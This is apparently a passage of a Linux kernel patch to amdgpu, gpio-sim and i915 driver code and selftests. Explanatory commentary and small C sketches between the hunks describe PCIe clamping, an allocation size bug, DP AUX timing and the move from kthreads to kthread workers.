+diff --git a/drivers/gpio/gpio-sim.c b/drivers/gpio/gpio-sim.c
+index cff68f31a09fd..803676e307d73 100644
+--- a/drivers/gpio/gpio-sim.c
++++ b/drivers/gpio/gpio-sim.c
+@@ -717,8 +717,10 @@ static char **gpio_sim_make_line_names(struct gpio_sim_bank *bank,
+ 	if (!line_names)
+ 		return ERR_PTR(-ENOMEM);
+ 
+-	list_for_each_entry(line, &bank->line_list, siblings)
+-		line_names[line->offset] = line->name;
++	list_for_each_entry(line, &bank->line_list, siblings) {
++		if (line->name && (line->offset <= max_offset))
++			line_names[line->offset] = line->name;
++	}
+ 
+ 	return line_names;
+ }
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_object.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_object.c
+index 4feedf518a191..ad8cb9e6d1ab0 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_object.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_object.c
+@@ -79,9 +79,10 @@ static void amdgpu_bo_user_destroy(struct ttm_buffer_object *tbo)
+ static void amdgpu_bo_vm_destroy(struct ttm_buffer_object *tbo)
+ {
+ 	struct amdgpu_device *adev = amdgpu_ttm_adev(tbo->bdev);
+-	struct amdgpu_bo *bo = ttm_to_amdgpu_bo(tbo);
++	struct amdgpu_bo *shadow_bo = ttm_to_amdgpu_bo(tbo), *bo;
+ 	struct amdgpu_bo_vm *vmbo;
+ 
++	bo = shadow_bo->parent;
+ 	vmbo = to_amdgpu_bo_vm(bo);
+ 	/* in case amdgpu_device_recover_vram got NULL of bo->parent */
+ 	if (!list_empty(&vmbo->shadow_list)) {
+@@ -691,11 +692,6 @@ int amdgpu_bo_create_vm(struct amdgpu_device *adev,
+ 		return r;
+ 
+ 	*vmbo_ptr = to_amdgpu_bo_vm(bo_ptr);
+-	INIT_LIST_HEAD(&(*vmbo_ptr)->shadow_list);
+-	/* Set destroy callback to amdgpu_bo_vm_destroy after vmbo->shadow_list
+-	 * is initialized.
+-	 */
+-	bo_ptr->tbo.destroy = &amdgpu_bo_vm_destroy;
+ 	return r;
+ }
+ 
+@@ -712,6 +708,8 @@ void amdgpu_bo_add_to_shadow_list(struct amdgpu_bo_vm *vmbo)
+ 
+ 	mutex_lock(&adev->shadow_list_lock);
+ 	list_add_tail(&vmbo->shadow_list, &adev->shadow_list);
++	vmbo->shadow->parent = amdgpu_bo_ref(&vmbo->bo);
++	vmbo->shadow->tbo.destroy = &amdgpu_bo_vm_destroy;
+ 	mutex_unlock(&adev->shadow_list_lock);
+ }
+ 
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_vm_pt.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_vm_pt.c
+index 01e42bdd8e4e8..4642cff0e1a4f 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_vm_pt.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_vm_pt.c
+@@ -564,7 +564,6 @@ int amdgpu_vm_pt_create(struct amdgpu_device *adev, struct amdgpu_vm *vm,
+ 		return r;
+ 	}
+ 
+-	(*vmbo)->shadow->parent = amdgpu_bo_ref(bo);
+ 	amdgpu_bo_add_to_shadow_list(*vmbo);
+ 
+ 	return 0;
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_vram_mgr.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_vram_mgr.c
+index 75c80c557b6ec..16594a0a6d186 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_vram_mgr.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_vram_mgr.c
+@@ -799,7 +799,7 @@ static void amdgpu_vram_mgr_debug(struct ttm_resource_manager *man,
+ {
+ 	struct amdgpu_vram_mgr *mgr = to_vram_mgr(man);
+ 	struct drm_buddy *mm = &mgr->mm;
+-	struct drm_buddy_block *block;
++	struct amdgpu_vram_reservation *rsv;
+ 
+ 	drm_printf(printer, "  vis usage:%llu\n",
+ 		   amdgpu_vram_mgr_vis_usage(mgr));
+@@ -811,8 +811,9 @@ static void amdgpu_vram_mgr_debug(struct ttm_resource_manager *man,
+ 	drm_buddy_print(mm, printer);
+ 
+ 	drm_printf(printer, "reserved:\n");
+-	list_for_each_entry(block, &mgr->reserved_pages, link)
+-		drm_buddy_block_print(mm, block, printer);
++	list_for_each_entry(rsv, &mgr->reserved_pages, blocks)
++		drm_printf(printer, "%#018llx-%#018llx: %llu\n",
++			rsv->start, rsv->start + rsv->size, rsv->size);
+ 	mutex_unlock(&mgr->lock);
+ }
+ 
+diff --git a/drivers/gpu/drm/amd/amdgpu/vi.c b/drivers/gpu/drm/amd/amdgpu/vi.c
+index d6c37c90c628c..53a3bb7fc9c47 100644
+--- a/drivers/gpu/drm/amd/amdgpu/vi.c
++++ b/drivers/gpu/drm/amd/amdgpu/vi.c
+@@ -542,8 +542,15 @@ static u32 vi_get_xclk(struct amdgpu_device *adev)
+ 	u32 reference_clock = adev->clock.spll.reference_freq;
+ 	u32 tmp;
+ 
+-	if (adev->flags & AMD_IS_APU)
+-		return reference_clock;
++	if (adev->flags & AMD_IS_APU) {
++		switch (adev->asic_type) {
++		case CHIP_STONEY:
++			/* vbios says 48 MHz, but the actual freq is 100 MHz */
++			return 10000;
++		default:
++			return reference_clock;
++		}
++	}
+ 
+ 	tmp = RREG32_SMC(ixCG_CLKPIN_CNTL_2);
+ 	if (REG_GET_FIELD(tmp, CG_CLKPIN_CNTL_2, MUX_TCLK_TO_XCLK))
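
The magic 10000 above only reads sensibly with the driver's unit convention in mind: amdgpu clock values are carried in 10 kHz units (an inference from the surrounding code, not stated in the hunk), so 100 MHz = 100 000 kHz = 10 000 units. As a sketch:

/* 100 MHz expressed in the driver's assumed 10 kHz clock units: */
#define KHZ_PER_UNIT		10
#define MHZ_TO_UNITS(mhz)	((mhz) * 1000 / KHZ_PER_UNIT)	/* 100 -> 10000 */
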
+diff --git a/drivers/gpu/drm/amd/display/dc/dml/dcn32/dcn32_fpu.c b/drivers/gpu/drm/amd/display/dc/dml/dcn32/dcn32_fpu.c
+index d2b184fdd7e02..f28caece5f901 100644
+--- a/drivers/gpu/drm/amd/display/dc/dml/dcn32/dcn32_fpu.c
++++ b/drivers/gpu/drm/amd/display/dc/dml/dcn32/dcn32_fpu.c
+@@ -137,7 +137,7 @@ struct _vcs_dpi_soc_bounding_box_st dcn3_2_soc = {
+ 	.urgent_out_of_order_return_per_channel_pixel_only_bytes = 4096,
+ 	.urgent_out_of_order_return_per_channel_pixel_and_vm_bytes = 4096,
+ 	.urgent_out_of_order_return_per_channel_vm_only_bytes = 4096,
+-	.pct_ideal_sdp_bw_after_urgent = 100.0,
++	.pct_ideal_sdp_bw_after_urgent = 90.0,
+ 	.pct_ideal_fabric_bw_after_urgent = 67.0,
+ 	.pct_ideal_dram_sdp_bw_after_urgent_pixel_only = 20.0,
+ 	.pct_ideal_dram_sdp_bw_after_urgent_pixel_and_vm = 60.0, // N/A, for now keep as is until DML implemented
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/smu11/sienna_cichlid_ppt.c b/drivers/gpu/drm/amd/pm/swsmu/smu11/sienna_cichlid_ppt.c
+index 75f18681e984c..85d53597eb07a 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/smu11/sienna_cichlid_ppt.c
++++ b/drivers/gpu/drm/amd/pm/swsmu/smu11/sienna_cichlid_ppt.c
+@@ -2067,33 +2067,94 @@ static int sienna_cichlid_display_disable_memory_clock_switch(struct smu_context
+ 	return ret;
+ }
+ 
++static void sienna_cichlid_get_override_pcie_settings(struct smu_context *smu,
++						      uint32_t *gen_speed_override,
++						      uint32_t *lane_width_override)
++{
++	struct amdgpu_device *adev = smu->adev;
++
++	*gen_speed_override = 0xff;
++	*lane_width_override = 0xff;
++
++	switch (adev->pdev->device) {
++	case 0x73A0:
++	case 0x73A1:
++	case 0x73A2:
++	case 0x73A3:
++	case 0x73AB:
++	case 0x73AE:
++		/* Bits 7:0: PCIE lane width, 1 to 7 corresponds to x1 to x32 */
++		*lane_width_override = 6;
++		break;
++	case 0x73E0:
++	case 0x73E1:
++	case 0x73E3:
++		*lane_width_override = 4;
++		break;
++	case 0x7420:
++	case 0x7421:
++	case 0x7422:
++	case 0x7423:
++	case 0x7424:
++		*lane_width_override = 3;
++		break;
++	default:
++		break;
++	}
++}
++
++#define MAX(a, b)	((a) > (b) ? (a) : (b))
++
+ static int sienna_cichlid_update_pcie_parameters(struct smu_context *smu,
+ 					 uint32_t pcie_gen_cap,
+ 					 uint32_t pcie_width_cap)
+ {
+ 	struct smu_11_0_dpm_context *dpm_context = smu->smu_dpm.dpm_context;
+-
+-	uint32_t smu_pcie_arg;
++	struct smu_11_0_pcie_table *pcie_table = &dpm_context->dpm_tables.pcie_table;
++	uint32_t gen_speed_override, lane_width_override;
+ 	uint8_t *table_member1, *table_member2;
++	uint32_t min_gen_speed, max_gen_speed;
++	uint32_t min_lane_width, max_lane_width;
++	uint32_t smu_pcie_arg;
+ 	int ret, i;
+ 
+ 	GET_PPTABLE_MEMBER(PcieGenSpeed, &table_member1);
+ 	GET_PPTABLE_MEMBER(PcieLaneCount, &table_member2);
+ 
+-	/* lclk dpm table setup */
+-	for (i = 0; i < MAX_PCIE_CONF; i++) {
+-		dpm_context->dpm_tables.pcie_table.pcie_gen[i] = table_member1[i];
+-		dpm_context->dpm_tables.pcie_table.pcie_lane[i] = table_member2[i];
++	sienna_cichlid_get_override_pcie_settings(smu,
++						  &gen_speed_override,
++						  &lane_width_override);
++
++	/* PCIE gen speed override */
++	if (gen_speed_override != 0xff) {
++		min_gen_speed = MIN(pcie_gen_cap, gen_speed_override);
++		max_gen_speed = MIN(pcie_gen_cap, gen_speed_override);
++	} else {
++		min_gen_speed = MAX(0, table_member1[0]);
++		max_gen_speed = MIN(pcie_gen_cap, table_member1[1]);
++		min_gen_speed = min_gen_speed > max_gen_speed ?
++				max_gen_speed : min_gen_speed;
+ 	}
++	pcie_table->pcie_gen[0] = min_gen_speed;
++	pcie_table->pcie_gen[1] = max_gen_speed;
++
++	/* PCIE lane width override */
++	if (lane_width_override != 0xff) {
++		min_lane_width = MIN(pcie_width_cap, lane_width_override);
++		max_lane_width = MIN(pcie_width_cap, lane_width_override);
++	} else {
++		min_lane_width = MAX(1, table_member2[0]);
++		max_lane_width = MIN(pcie_width_cap, table_member2[1]);
++		min_lane_width = min_lane_width > max_lane_width ?
++				 max_lane_width : min_lane_width;
++	}
++	pcie_table->pcie_lane[0] = min_lane_width;
++	pcie_table->pcie_lane[1] = max_lane_width;
+ 
+ 	for (i = 0; i < NUM_LINK_LEVELS; i++) {
+-		smu_pcie_arg = (i << 16) |
+-			((table_member1[i] <= pcie_gen_cap) ?
+-			 (table_member1[i] << 8) :
+-			 (pcie_gen_cap << 8)) |
+-			((table_member2[i] <= pcie_width_cap) ?
+-			 table_member2[i] :
+-			 pcie_width_cap);
++		smu_pcie_arg = (i << 16 |
++				pcie_table->pcie_gen[i] << 8 |
++				pcie_table->pcie_lane[i]);
+ 
+ 		ret = smu_cmn_send_smc_msg_with_param(smu,
+ 				SMU_MSG_OverridePcieParameters,
+@@ -2101,11 +2162,6 @@ static int sienna_cichlid_update_pcie_parameters(struct smu_context *smu,
+ 				NULL);
+ 		if (ret)
+ 			return ret;
+-
+-		if (table_member1[i] > pcie_gen_cap)
+-			dpm_context->dpm_tables.pcie_table.pcie_gen[i] = pcie_gen_cap;
+-		if (table_member2[i] > pcie_width_cap)
+-			dpm_context->dpm_tables.pcie_table.pcie_lane[i] = pcie_width_cap;
+ 	}
+ 
+ 	return 0;
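
The rewrite above reduces the per-level PCIe table to a clamped [min, max] pair: with no per-device override, min comes from the pptable and max is capped by the platform; with an override (the SKUs in the switch), both ends are pinned to the capped override, which is why min_gen_speed and max_gen_speed are intentionally computed the same way. A standalone sketch of the clamping policy (names hypothetical):

#include <stdint.h>

#define MIN(a, b)	((a) < (b) ? (a) : (b))

/* Clamp a DPM [lo, hi] range against a platform cap; an override of
 * 0xff means "none", anything else pins both ends to MIN(cap, override). */
static void clamp_range(uint32_t cap, uint32_t override,
			uint32_t tbl_lo, uint32_t tbl_hi,
			uint32_t *lo, uint32_t *hi)
{
	if (override != 0xff) {
		*lo = *hi = MIN(cap, override);
		return;
	}
	*lo = tbl_lo;
	*hi = MIN(cap, tbl_hi);
	if (*lo > *hi)		/* keep the range well-formed */
		*lo = *hi;
}
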
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0.c b/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0.c
+index 479cbf05c3310..5143b4df2cc14 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0.c
++++ b/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0.c
+@@ -582,11 +582,11 @@ int smu_v13_0_init_power(struct smu_context *smu)
+ 	if (smu_power->power_context || smu_power->power_context_size != 0)
+ 		return -EINVAL;
+ 
+-	smu_power->power_context = kzalloc(sizeof(struct smu_13_0_dpm_context),
++	smu_power->power_context = kzalloc(sizeof(struct smu_13_0_power_context),
+ 					   GFP_KERNEL);
+ 	if (!smu_power->power_context)
+ 		return -ENOMEM;
+-	smu_power->power_context_size = sizeof(struct smu_13_0_dpm_context);
++	smu_power->power_context_size = sizeof(struct smu_13_0_power_context);
+ 
+ 	return 0;
+ }
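
The bug above is a size/type mismatch: the power context was allocated with sizeof(struct smu_13_0_dpm_context) instead of the struct actually stored there. When the destination pointer has a concrete type, the usual kernel idiom rules this class of bug out, because the size is derived from the pointer itself; when the destination is a generic void * (as a context pointer may well be, which would explain the explicit struct name here), type and size must be kept in sync by hand - exactly what went wrong. The idiom, with a hypothetical struct:

struct foo_context *ctx;

ctx = kzalloc(sizeof(*ctx), GFP_KERNEL);	/* size always tracks ctx's type */
if (!ctx)
	return -ENOMEM;
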
+diff --git a/drivers/gpu/drm/i915/display/intel_dp_aux.c b/drivers/gpu/drm/i915/display/intel_dp_aux.c
+index 7f3f2d50e6cde..ab357161ccc3a 100644
+--- a/drivers/gpu/drm/i915/display/intel_dp_aux.c
++++ b/drivers/gpu/drm/i915/display/intel_dp_aux.c
+@@ -119,6 +119,32 @@ static u32 skl_get_aux_clock_divider(struct intel_dp *intel_dp, int index)
+ 	return index ? 0 : 1;
+ }
+ 
++static int intel_dp_aux_sync_len(void)
++{
++	int precharge = 16; /* 10-16 */
++	int preamble = 16;
++
++	return precharge + preamble;
++}
++
++static int intel_dp_aux_fw_sync_len(void)
++{
++	int precharge = 10; /* 10-16 */
++	int preamble = 8;
++
++	return precharge + preamble;
++}
++
++static int g4x_dp_aux_precharge_len(void)
++{
++	int precharge_min = 10;
++	int preamble = 16;
++
++	/* HW wants the length of the extra precharge in 2us units */
++	return (intel_dp_aux_sync_len() -
++		precharge_min - preamble) / 2;
++}
++
+ static u32 g4x_get_aux_send_ctl(struct intel_dp *intel_dp,
+ 				int send_bytes,
+ 				u32 aux_clock_divider)
+@@ -141,7 +167,7 @@ static u32 g4x_get_aux_send_ctl(struct intel_dp *intel_dp,
+ 	       timeout |
+ 	       DP_AUX_CH_CTL_RECEIVE_ERROR |
+ 	       (send_bytes << DP_AUX_CH_CTL_MESSAGE_SIZE_SHIFT) |
+-	       (3 << DP_AUX_CH_CTL_PRECHARGE_2US_SHIFT) |
++	       (g4x_dp_aux_precharge_len() << DP_AUX_CH_CTL_PRECHARGE_2US_SHIFT) |
+ 	       (aux_clock_divider << DP_AUX_CH_CTL_BIT_CLOCK_2X_SHIFT);
+ }
+ 
+@@ -165,8 +191,8 @@ static u32 skl_get_aux_send_ctl(struct intel_dp *intel_dp,
+ 	      DP_AUX_CH_CTL_TIME_OUT_MAX |
+ 	      DP_AUX_CH_CTL_RECEIVE_ERROR |
+ 	      (send_bytes << DP_AUX_CH_CTL_MESSAGE_SIZE_SHIFT) |
+-	      DP_AUX_CH_CTL_FW_SYNC_PULSE_SKL(24) |
+-	      DP_AUX_CH_CTL_SYNC_PULSE_SKL(32);
++	      DP_AUX_CH_CTL_FW_SYNC_PULSE_SKL(intel_dp_aux_fw_sync_len()) |
++	      DP_AUX_CH_CTL_SYNC_PULSE_SKL(intel_dp_aux_sync_len());
+ 
+ 	if (intel_tc_port_in_tbt_alt_mode(dig_port))
+ 		ret |= DP_AUX_CH_CTL_TBT_IO;
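
The new helpers replace three magic numbers with arithmetic that shows where they come from; recomputing the old constants also makes the one real behavior change visible (fast-wake sync drops from 24 to 18 pulses):

int sync_len    = 16 + 16;		/* precharge + preamble = 32, the old SYNC_PULSE_SKL(32) */
int fw_sync_len = 10 + 8;		/* 18; this replaces the old FW_SYNC_PULSE_SKL(24) */
/* g4x wants the precharge beyond the 10-pulse minimum and the 16-pulse
 * preamble, expressed in 2 us units: */
int g4x_extra   = (32 - 10 - 16) / 2;	/* 3, matching the old hard-coded value */
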
+diff --git a/drivers/gpu/drm/i915/gem/selftests/i915_gem_context.c b/drivers/gpu/drm/i915/gem/selftests/i915_gem_context.c
+index c6ad67b90e8af..a4858be12ee76 100644
+--- a/drivers/gpu/drm/i915/gem/selftests/i915_gem_context.c
++++ b/drivers/gpu/drm/i915/gem/selftests/i915_gem_context.c
+@@ -179,97 +179,108 @@ out_file:
+ }
+ 
+ struct parallel_switch {
+-	struct task_struct *tsk;
++	struct kthread_worker *worker;
++	struct kthread_work work;
+ 	struct intel_context *ce[2];
++	int result;
+ };
+ 
+-static int __live_parallel_switch1(void *data)
++static void __live_parallel_switch1(struct kthread_work *work)
+ {
+-	struct parallel_switch *arg = data;
++	struct parallel_switch *arg =
++		container_of(work, typeof(*arg), work);
+ 	IGT_TIMEOUT(end_time);
+ 	unsigned long count;
+ 
+ 	count = 0;
++	arg->result = 0;
+ 	do {
+ 		struct i915_request *rq = NULL;
+-		int err, n;
++		int n;
+ 
+-		err = 0;
+-		for (n = 0; !err && n < ARRAY_SIZE(arg->ce); n++) {
++		for (n = 0; !arg->result && n < ARRAY_SIZE(arg->ce); n++) {
+ 			struct i915_request *prev = rq;
+ 
+ 			rq = i915_request_create(arg->ce[n]);
+ 			if (IS_ERR(rq)) {
+ 				i915_request_put(prev);
+-				return PTR_ERR(rq);
++				arg->result = PTR_ERR(rq);
++				break;
+ 			}
+ 
+ 			i915_request_get(rq);
+ 			if (prev) {
+-				err = i915_request_await_dma_fence(rq, &prev->fence);
++				arg->result =
++					i915_request_await_dma_fence(rq,
++								     &prev->fence);
+ 				i915_request_put(prev);
+ 			}
+ 
+ 			i915_request_add(rq);
+ 		}
++
++		if (IS_ERR_OR_NULL(rq))
++			break;
++
+ 		if (i915_request_wait(rq, 0, HZ) < 0)
+-			err = -ETIME;
++			arg->result = -ETIME;
++
+ 		i915_request_put(rq);
+-		if (err)
+-			return err;
+ 
+ 		count++;
+-	} while (!__igt_timeout(end_time, NULL));
++	} while (!arg->result && !__igt_timeout(end_time, NULL));
+ 
+-	pr_info("%s: %lu switches (sync)\n", arg->ce[0]->engine->name, count);
+-	return 0;
++	pr_info("%s: %lu switches (sync) <%d>\n",
++		arg->ce[0]->engine->name, count, arg->result);
+ }
+ 
+-static int __live_parallel_switchN(void *data)
++static void __live_parallel_switchN(struct kthread_work *work)
+ {
+-	struct parallel_switch *arg = data;
++	struct parallel_switch *arg =
++		container_of(work, typeof(*arg), work);
+ 	struct i915_request *rq = NULL;
+ 	IGT_TIMEOUT(end_time);
+ 	unsigned long count;
+ 	int n;
+ 
+ 	count = 0;
++	arg->result = 0;
+ 	do {
+-		for (n = 0; n < ARRAY_SIZE(arg->ce); n++) {
++		for (n = 0; !arg->result && n < ARRAY_SIZE(arg->ce); n++) {
+ 			struct i915_request *prev = rq;
+-			int err = 0;
+ 
+ 			rq = i915_request_create(arg->ce[n]);
+ 			if (IS_ERR(rq)) {
+ 				i915_request_put(prev);
+-				return PTR_ERR(rq);
++				arg->result = PTR_ERR(rq);
++				break;
+ 			}
+ 
+ 			i915_request_get(rq);
+ 			if (prev) {
+-				err = i915_request_await_dma_fence(rq, &prev->fence);
++				arg->result =
++					i915_request_await_dma_fence(rq,
++								     &prev->fence);
+ 				i915_request_put(prev);
+ 			}
+ 
+ 			i915_request_add(rq);
+-			if (err) {
+-				i915_request_put(rq);
+-				return err;
+-			}
+ 		}
+ 
+ 		count++;
+-	} while (!__igt_timeout(end_time, NULL));
+-	i915_request_put(rq);
++	} while (!arg->result && !__igt_timeout(end_time, NULL));
+ 
+-	pr_info("%s: %lu switches (many)\n", arg->ce[0]->engine->name, count);
+-	return 0;
++	if (!IS_ERR_OR_NULL(rq))
++		i915_request_put(rq);
++
++	pr_info("%s: %lu switches (many) <%d>\n",
++		arg->ce[0]->engine->name, count, arg->result);
+ }
+ 
+ static int live_parallel_switch(void *arg)
+ {
+ 	struct drm_i915_private *i915 = arg;
+-	static int (* const func[])(void *arg) = {
++	static void (* const func[])(struct kthread_work *) = {
+ 		__live_parallel_switch1,
+ 		__live_parallel_switchN,
+ 		NULL,
+@@ -277,7 +288,7 @@ static int live_parallel_switch(void *arg)
+ 	struct parallel_switch *data = NULL;
+ 	struct i915_gem_engines *engines;
+ 	struct i915_gem_engines_iter it;
+-	int (* const *fn)(void *arg);
++	void (* const *fn)(struct kthread_work *);
+ 	struct i915_gem_context *ctx;
+ 	struct intel_context *ce;
+ 	struct file *file;
+@@ -335,8 +346,10 @@ static int live_parallel_switch(void *arg)
+ 				continue;
+ 
+ 			ce = intel_context_create(data[m].ce[0]->engine);
+-			if (IS_ERR(ce))
++			if (IS_ERR(ce)) {
++				err = PTR_ERR(ce);
+ 				goto out;
++			}
+ 
+ 			err = intel_context_pin(ce);
+ 			if (err) {
+@@ -348,9 +361,24 @@ static int live_parallel_switch(void *arg)
+ 		}
+ 	}
+ 
++	for (n = 0; n < count; n++) {
++		struct kthread_worker *worker;
++
++		if (!data[n].ce[0])
++			continue;
++
++		worker = kthread_create_worker(0, "igt/parallel:%s",
++					       data[n].ce[0]->engine->name);
++		if (IS_ERR(worker)) {
++			err = PTR_ERR(worker);
++			goto out;
++		}
++
++		data[n].worker = worker;
++	}
++
+ 	for (fn = func; !err && *fn; fn++) {
+ 		struct igt_live_test t;
+-		int n;
+ 
+ 		err = igt_live_test_begin(&t, i915, __func__, "");
+ 		if (err)
+@@ -360,34 +388,23 @@ static int live_parallel_switch(void *arg)
+ 			if (!data[n].ce[0])
+ 				continue;
+ 
+-			data[n].tsk = kthread_run(*fn, &data[n],
+-						  "igt/parallel:%s",
+-						  data[n].ce[0]->engine->name);
+-			if (IS_ERR(data[n].tsk)) {
+-				err = PTR_ERR(data[n].tsk);
+-				break;
+-			}
+-			get_task_struct(data[n].tsk);
++			data[n].result = 0;
++			kthread_init_work(&data[n].work, *fn);
++			kthread_queue_work(data[n].worker, &data[n].work);
+ 		}
+ 
+-		yield(); /* start all threads before we kthread_stop() */
+-
+ 		for (n = 0; n < count; n++) {
+-			int status;
+-
+-			if (IS_ERR_OR_NULL(data[n].tsk))
+-				continue;
+-
+-			status = kthread_stop(data[n].tsk);
+-			if (status && !err)
+-				err = status;
+-
+-			put_task_struct(data[n].tsk);
+-			data[n].tsk = NULL;
++			if (data[n].ce[0]) {
++				kthread_flush_work(&data[n].work);
++				if (data[n].result && !err)
++					err = data[n].result;
++			}
+ 		}
+ 
+-		if (igt_live_test_end(&t))
+-			err = -EIO;
++		if (igt_live_test_end(&t)) {
++			err = err ?: -EIO;
++			break;
++		}
+ 	}
+ 
+ out:
+@@ -399,6 +416,9 @@ out:
+ 			intel_context_unpin(data[n].ce[m]);
+ 			intel_context_put(data[n].ce[m]);
+ 		}
++
++		if (data[n].worker)
++			kthread_destroy_worker(data[n].worker);
+ 	}
+ 	kfree(data);
+ out_file:
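
This selftest, and several more below, are converted from bare kthreads (kthread_run()/kthread_stop(), with the result smuggled out through the task exit code) to the kthread_worker API: work items are void functions that recover their state with container_of(), report results through a field of the containing struct, and have an explicit create/queue/flush/destroy lifetime. A reduced skeleton of the pattern, assuming kernel context:

#include <linux/err.h>
#include <linux/kthread.h>

struct job {
	struct kthread_work work;
	int result;			/* replaces the kthread exit code */
};

static void job_fn(struct kthread_work *work)
{
	struct job *j = container_of(work, struct job, work);

	j->result = 0;			/* ... the actual work ... */
}

static int run_one_job(struct job *j)
{
	struct kthread_worker *worker;

	worker = kthread_create_worker(0, "igt/example");
	if (IS_ERR(worker))
		return PTR_ERR(worker);

	kthread_init_work(&j->work, job_fn);
	kthread_queue_work(worker, &j->work);
	kthread_flush_work(&j->work);	/* wait for completion */
	kthread_destroy_worker(worker);

	return j->result;
}
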
+diff --git a/drivers/gpu/drm/i915/gt/selftest_execlists.c b/drivers/gpu/drm/i915/gt/selftest_execlists.c
+index 1e08b2473b993..b370411d43628 100644
+--- a/drivers/gpu/drm/i915/gt/selftest_execlists.c
++++ b/drivers/gpu/drm/i915/gt/selftest_execlists.c
+@@ -1532,8 +1532,8 @@ static int live_busywait_preempt(void *arg)
+ 	struct drm_i915_gem_object *obj;
+ 	struct i915_vma *vma;
+ 	enum intel_engine_id id;
+-	int err = -ENOMEM;
+ 	u32 *map;
++	int err;
+ 
+ 	/*
+ 	 * Verify that even without HAS_LOGICAL_RING_PREEMPTION, we can
+@@ -1541,13 +1541,17 @@ static int live_busywait_preempt(void *arg)
+ 	 */
+ 
+ 	ctx_hi = kernel_context(gt->i915, NULL);
+-	if (!ctx_hi)
+-		return -ENOMEM;
++	if (IS_ERR(ctx_hi))
++		return PTR_ERR(ctx_hi);
++
+ 	ctx_hi->sched.priority = I915_CONTEXT_MAX_USER_PRIORITY;
+ 
+ 	ctx_lo = kernel_context(gt->i915, NULL);
+-	if (!ctx_lo)
++	if (IS_ERR(ctx_lo)) {
++		err = PTR_ERR(ctx_lo);
+ 		goto err_ctx_hi;
++	}
++
+ 	ctx_lo->sched.priority = I915_CONTEXT_MIN_USER_PRIORITY;
+ 
+ 	obj = i915_gem_object_create_internal(gt->i915, PAGE_SIZE);
+@@ -3475,12 +3479,14 @@ static int random_priority(struct rnd_state *rnd)
+ 
+ struct preempt_smoke {
+ 	struct intel_gt *gt;
++	struct kthread_work work;
+ 	struct i915_gem_context **contexts;
+ 	struct intel_engine_cs *engine;
+ 	struct drm_i915_gem_object *batch;
+ 	unsigned int ncontext;
+ 	struct rnd_state prng;
+ 	unsigned long count;
++	int result;
+ };
+ 
+ static struct i915_gem_context *smoke_context(struct preempt_smoke *smoke)
+@@ -3540,34 +3546,31 @@ unpin:
+ 	return err;
+ }
+ 
+-static int smoke_crescendo_thread(void *arg)
++static void smoke_crescendo_work(struct kthread_work *work)
+ {
+-	struct preempt_smoke *smoke = arg;
++	struct preempt_smoke *smoke = container_of(work, typeof(*smoke), work);
+ 	IGT_TIMEOUT(end_time);
+ 	unsigned long count;
+ 
+ 	count = 0;
+ 	do {
+ 		struct i915_gem_context *ctx = smoke_context(smoke);
+-		int err;
+ 
+-		err = smoke_submit(smoke,
+-				   ctx, count % I915_PRIORITY_MAX,
+-				   smoke->batch);
+-		if (err)
+-			return err;
++		smoke->result = smoke_submit(smoke, ctx,
++					     count % I915_PRIORITY_MAX,
++					     smoke->batch);
+ 
+ 		count++;
+-	} while (count < smoke->ncontext && !__igt_timeout(end_time, NULL));
++	} while (!smoke->result && count < smoke->ncontext &&
++		 !__igt_timeout(end_time, NULL));
+ 
+ 	smoke->count = count;
+-	return 0;
+ }
+ 
+ static int smoke_crescendo(struct preempt_smoke *smoke, unsigned int flags)
+ #define BATCH BIT(0)
+ {
+-	struct task_struct *tsk[I915_NUM_ENGINES] = {};
++	struct kthread_worker *worker[I915_NUM_ENGINES] = {};
+ 	struct preempt_smoke *arg;
+ 	struct intel_engine_cs *engine;
+ 	enum intel_engine_id id;
+@@ -3578,6 +3581,8 @@ static int smoke_crescendo(struct preempt_smoke *smoke, unsigned int flags)
+ 	if (!arg)
+ 		return -ENOMEM;
+ 
++	memset(arg, 0, I915_NUM_ENGINES * sizeof(*arg));
++
+ 	for_each_engine(engine, smoke->gt, id) {
+ 		arg[id] = *smoke;
+ 		arg[id].engine = engine;
+@@ -3585,31 +3590,28 @@ static int smoke_crescendo(struct preempt_smoke *smoke, unsigned int flags)
+ 			arg[id].batch = NULL;
+ 		arg[id].count = 0;
+ 
+-		tsk[id] = kthread_run(smoke_crescendo_thread, arg,
+-				      "igt/smoke:%d", id);
+-		if (IS_ERR(tsk[id])) {
+-			err = PTR_ERR(tsk[id]);
++		worker[id] = kthread_create_worker(0, "igt/smoke:%d", id);
++		if (IS_ERR(worker[id])) {
++			err = PTR_ERR(worker[id]);
+ 			break;
+ 		}
+-		get_task_struct(tsk[id]);
+-	}
+ 
+-	yield(); /* start all threads before we kthread_stop() */
++		kthread_init_work(&arg[id].work, smoke_crescendo_work);
++		kthread_queue_work(worker[id], &arg[id].work);
++	}
+ 
+ 	count = 0;
+ 	for_each_engine(engine, smoke->gt, id) {
+-		int status;
+-
+-		if (IS_ERR_OR_NULL(tsk[id]))
++		if (IS_ERR_OR_NULL(worker[id]))
+ 			continue;
+ 
+-		status = kthread_stop(tsk[id]);
+-		if (status && !err)
+-			err = status;
++		kthread_flush_work(&arg[id].work);
++		if (arg[id].result && !err)
++			err = arg[id].result;
+ 
+ 		count += arg[id].count;
+ 
+-		put_task_struct(tsk[id]);
++		kthread_destroy_worker(worker[id]);
+ 	}
+ 
+ 	pr_info("Submitted %lu crescendo:%x requests across %d engines and %d contexts\n",
+diff --git a/drivers/gpu/drm/i915/gt/selftest_hangcheck.c b/drivers/gpu/drm/i915/gt/selftest_hangcheck.c
+index 7f3bb1d34dfbf..71263058a7b05 100644
+--- a/drivers/gpu/drm/i915/gt/selftest_hangcheck.c
